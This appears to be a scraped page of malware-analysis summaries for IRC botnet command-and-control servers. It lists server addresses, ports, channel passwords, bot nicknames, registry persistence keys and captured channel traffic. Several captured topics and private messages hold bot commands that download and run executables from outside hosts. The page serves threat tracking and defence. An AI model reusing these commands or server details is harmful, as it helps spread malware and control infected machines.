Remote Host Port Number193.242.108.49 8069.10.48.106 8076.73.58.215 5900 NICK VirUs-cpvpvowuUSER VirUs “” “fah” :8Coded8VirUs..JOIN #5# VirusPRIVMSG #5# :Success.PONG :Secret.Virus.Gov Now talking in #5#Topic On: [ #5# ] [ !NAZELlol http://ogard.t35.com/NoVaC4.jpeg update.exe 1 ]Topic By: [ TuX ]Modes On: [ #5# ] [ +smntMu ] PASS Virus * The data identified by the following URLs was thenRead more...
irc.darkproducts.net
Remote Host Port Number82.146.51.252 51987 NICK pLagUe{XP-USA}2333USER pntv 0 0 :pLagUe{XP-USA}2333USERHOST pLagUe{XP-USA}2333MODE pLagUe{XP-USA}2333 +x+iBJOIN #deusexNICK pLagUe{XP-USA}8842USER qtvbw 0 0 :pLagUe{XP-USA}8842USERHOST pLagUe{XP-USA}8842MODE pLagUe{XP-USA}8842 +x+iBNICK pLagUe{XP-USA}8083USER yqei 0 0 :pLagUe{XP-USA}8083USERHOST pLagUe{XP-USA}8083MODE pLagUe{XP-USA}8083 +x+iBNICK pLagUe{XP-USA}4684USER uwscj 0 0 :pLagUe{XP-USA}4684USERHOST pLagUe{XP-USA}4684MODE pLagUe{XP-USA}4684 +x+iBNICK pLagUe{XP-USA}5339USER jgae 0 0 :pLagUe{XP-USA}5339USERHOST pLagUe{XP-USA}5339MODE pLagUe{XP-USA}5339 +x+iB Registry Modifications * The following Registry Keys wereRead more...
irc.oftc.net
o Host By Name: + Requested Host: irc.oftc.net + Resulting Address: 64.62.190.36 o Connection Established: 0 o Socket: 0 * Outgoing Connections + IRC Data # User Name: tliubw # Host Name: 0 # Server Name: # Real Name: [M]USA|74754 # Nick Name: [M]USA|74754 # Non RFC Conform: 1 * Channel o Name: #zindienz *Read more...
irc.snahosting.net
95.168.170.113 (6667) Invisible Users: 129Operators: 1 operator(s) onlineChannels: 9 channels formedClients: I have 130 clients and 0 serversLocal users: Current Local Users: 130 Max: 159Global users: Current Global Users: 130 Max: 159 Now talking in #imbotTopic On: [ #imbot ] [ .msn.msg http://www.altoprak.net/0.exe omg 😀 ]Topic By: [ KankilerimUser ]Modes On: [ #imbot ] [Read more...
ke7.no-ip.info
Remote Host Port Number71.195.82.47 6667 NICK XP|00|USA|SP2|8660USER ydkxvw 0 0 :XP|00|USA|SP2|8660USERHOST XP|00|USA|SP2|8660MODE XP|00|USA|SP2|8660 +x+iBJOIN #hedley#PONG :ke7.no-ip.infoPASS og * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Memory Modifications * There was a new process created in the system: Process Name Process Filename Main Module Sizemsconfig.exe %System%msconfig.exeRead more...
Private.ws(645 bots)
Remote Host Port Number195.197.175.21 6667201.45.219.146 6667 NICK VenwUSER lalitha “” “Helsinki.FI.EU.Undernet.Org” :GigiPONG :1030512791SILENCE +*!*@*MODE Venw +iwxMODE nathaniea +iwxUSER Orlie “” “remuser.strangled.net” :NICK ianiUSER khan “” “remuser.strangled.net” :14OOooOO Lume Noua!!!NICK :orangenMODE iani +iNICK :nathanieaMODE Venw +iJOIN #droneMODE #drone Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREClasses.cha o HKEY_LOCAL_MACHINESOFTWAREClasses.chat o HKEY_LOCAL_MACHINESOFTWAREClassesChatFile o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileDefaultIcon oRead more...
Secret.Virus.Gov(ogard from unkn0wn.ws 23k net dci bot)
Remote Host Port Number174.143.212.148 666766.45.237.212 80 * The data identified by the following URL was then requested from the remote web server: o http://accf0ur.t35.com/03.jpeg NICK VirUs-oqgsnaxaUSER VirUs “” “mqo” :8Coded8VirUs..JOIN #OgarD3# VirusPRIVMSG #OgarD3# :Success. PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-AAX2-5657QWE232788} * The newly created Registry ValueRead more...
61.139.151.20
Remote Host Port Number61.139.151.20 6697 MODE MetroP-XP820JOIN #putasPONG bitches.teibol.comNICK MetroP-XP820USER USA63600 * 0 :COMPUTERNAME PASS msnfuck Other details * The following port was open in the system: Port Protocol Process1052 TCP iexplore.exe (%System%iexplore.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Internet Explorer = “iexplore.exe” so that iexplore.exe runs everyRead more...
sip4.voipkosovasite.com
Unknown ConnectionsHost By Name:Requested Host: home-off-d5f0acResulting Address: 172.16.2.61Requested Host: sip4.voipkosovasite.comResulting Address: 82.114.87.46Connection Established: 0Socket: 0Outgoing ConnectionsIRC DataUser Name: XP-5101Host Name: *Server Name: Real Name: HOME-OFF-D5F0ACNick Name: [00|USA|169352]Non RFC Conform: 1ChannelName: #!a!Topic Deleted: :.msn.stop|.msn.msg foto? http://xhena.xh.ohost.de/viewimage.php?=Private Message DeletedValue: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.login mamajokero -sValue: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.r.getfile http://82.114.87.46/set.jpg c:/sd.exe 1 -sNotice Message DeletedValue: :irc.priv8net.com NOTICERead more...
92.241.164.197
Remote Host Port Number92.241.164.197 8877 NICK ENGLISH|COMPUTERNAME|241NICK ENGLISH|COMPUTERNAME|162USER ENGLISH|COMPUTERNAME|162 0 * :Hoooooly 67893PONG 781430258JOIN #freeUSER ENGLISH|COMPUTERNAME|241 0 * :Hoooooly 88723PONG 653356001PING primax.besecure.biz Other details The following ports were open in the system:Port Protocol Process1052 TCP reg32.exe (%System%reg32.exe)1053 TCP reg32.exe (%System%reg32.exe)1054 TCP reg32.exe (%System%reg32.exe Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAYHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAY000HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SECULAY000ControlHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLayHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLaySecurityHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSecuLayEnumHKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAYHKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAY000HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_SECULAY000ControlHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLayHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLaySecurityHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuLayEnumThe newly created Registry ValuesRead more...